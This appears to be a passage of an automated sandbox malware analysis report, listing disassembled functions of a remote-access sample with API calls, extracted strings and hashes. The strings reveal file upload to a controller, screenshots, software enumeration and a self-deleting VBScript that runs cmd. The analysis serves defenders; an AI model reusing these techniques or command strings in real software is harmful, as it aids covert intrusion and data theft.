                                      • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                      • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                      • API String ID: 2490988753-1941338355
                                      • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                      • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                      • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                      • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$EnvironmentVariable$_wcschr
                                      • String ID:
                                      • API String ID: 3899193279-0
                                      • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                      • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                      • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                      • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                      • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                      • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                      • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                      • Sleep.KERNEL32(00000064), ref: 00412E94
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                      • String ID: /stext "$0TG$0TG$NG$NG
                                      • API String ID: 1223786279-2576077980
                                      • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                      • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                      • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                      • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                      • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnumOpen
                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                      • API String ID: 1332880857-3714951968
                                      • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                      • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                      • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                      • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                      • GetCursorPos.USER32(?), ref: 0041D5E9
                                      • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                      • ExitProcess.KERNEL32 ref: 0041D665
                                      • CreatePopupMenu.USER32 ref: 0041D66B
                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                      • String ID: Close
                                      • API String ID: 1657328048-3535843008
                                      • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                      • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                      • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                      • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$Info
                                      • String ID:
                                      • API String ID: 2509303402-0
                                      • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                      • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                      • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                      • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                      • __aulldiv.LIBCMT ref: 00408D4D
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                      • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                      • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                      • API String ID: 3086580692-2582957567
                                      • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                      • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                      • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                      • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 0040A740
                                        • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                        • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                        • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                        • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                      • API String ID: 3795512280-1152054767
                                      • Opcode ID: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                      • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                      • Opcode Fuzzy Hash: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                      • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 004048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                      • WSAGetLastError.WS2_32 ref: 00404A21
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-3229884001
                                      • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                      • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                      • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                      • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0045130A
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                      • _free.LIBCMT ref: 004512FF
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00451321
                                      • _free.LIBCMT ref: 00451336
                                      • _free.LIBCMT ref: 00451341
                                      • _free.LIBCMT ref: 00451363
                                      • _free.LIBCMT ref: 00451376
                                      • _free.LIBCMT ref: 00451384
                                      • _free.LIBCMT ref: 0045138F
                                      • _free.LIBCMT ref: 004513C7
                                      • _free.LIBCMT ref: 004513CE
                                      • _free.LIBCMT ref: 004513EB
                                      • _free.LIBCMT ref: 00451403
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                      • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                      • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00419FB9
                                      • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                      • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 0041A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                      • API String ID: 489098229-1431523004
                                      • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                      • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                      • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                      • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                        • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                        • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                        • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                      • ExitProcess.KERNEL32 ref: 0040D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-3159800282
                                      • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                      • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                      • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                      • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                      • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                      • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                      • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                      • GetLastError.KERNEL32 ref: 00455CEF
                                      • __dosmaperr.LIBCMT ref: 00455CF6
                                      • GetFileType.KERNEL32(00000000), ref: 00455D02
                                      • GetLastError.KERNEL32 ref: 00455D0C
                                      • __dosmaperr.LIBCMT ref: 00455D15
                                      • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                      • CloseHandle.KERNEL32(?), ref: 00455E7F
                                      • GetLastError.KERNEL32 ref: 00455EB1
                                      • __dosmaperr.LIBCMT ref: 00455EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                      • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                      • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                      • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                      • __alloca_probe_16.LIBCMT ref: 00453EEA
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                      • __alloca_probe_16.LIBCMT ref: 00453F94
                                      • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                      • __freea.LIBCMT ref: 00454003
                                      • __freea.LIBCMT ref: 0045400F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID: \@E
                                      • API String ID: 201697637-1814623452
                                      • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                      • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                      • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                                      • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                      • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                      • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                      • __freea.LIBCMT ref: 0044AE30
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • __freea.LIBCMT ref: 0044AE39
                                      • __freea.LIBCMT ref: 0044AE5E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID: $C$PkGNG
                                      • API String ID: 3864826663-3740547665
                                      • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                      • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                      • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                                      • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
